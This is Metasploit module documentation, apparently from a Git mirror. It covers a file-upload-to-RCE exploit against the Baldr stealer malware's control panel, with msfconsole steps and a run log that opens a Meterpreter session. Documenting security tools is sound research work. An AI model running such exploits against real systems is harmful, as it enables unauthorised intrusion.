metasploit-gs/documentation/modules/exploit/multi/http/baldr_upload_exec.md at dac3cbcbcdfd0064ef4337abc5b6ab91015e0a0a

adam/metasploit-gs

Fork 0

Files

T

Ege Balcı 7985eafda0 Add Baldr Botnet Panel RCE Module

2020-07-24 07:45:43 +03:00

1.5 KiB

Raw Blame History

Vulnerable Application

Description

This module exploits a arbitrary file upload vulnerability within the Baldr stealer malware control panel. Attackers can turn this vulnerability into an RCE by adding a malicious PHP code inside the victim logs ZIP file and registering a new bot to the panel by uploading the ZIP file under logs directory. On versions 3.0 and 3.1 victim logs are ciphered by a random 4 byte XOR key. This exploit module retrieves the IP spesific XOR key from panel gate and registers a new victim to the panel with adding the selected payload inside the victim logs.

Verification Steps

Install the application
Start msfconsole
Do: use exploit/multi/http/baldr_upload_exec
Do set rhost 192.168.1.27
Do: check

[*] Verison: Baldr <= v2.0
[+] 192.168.1.27:80 - The target is vulnerable.

Targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto
   1   <= v2.0
   2   v2.2
   3   v3.0 & v3.1

Scenarios

msf5 > use exploit/multi/http/baldr_upload_exec 
msf5 exploit(exploit/multi/http/baldr_upload_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/baldr_upload_exec) > run

[*] Baldr Verison: <= v2.0
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300

meterpreter >

1.5 KiB Raw Blame History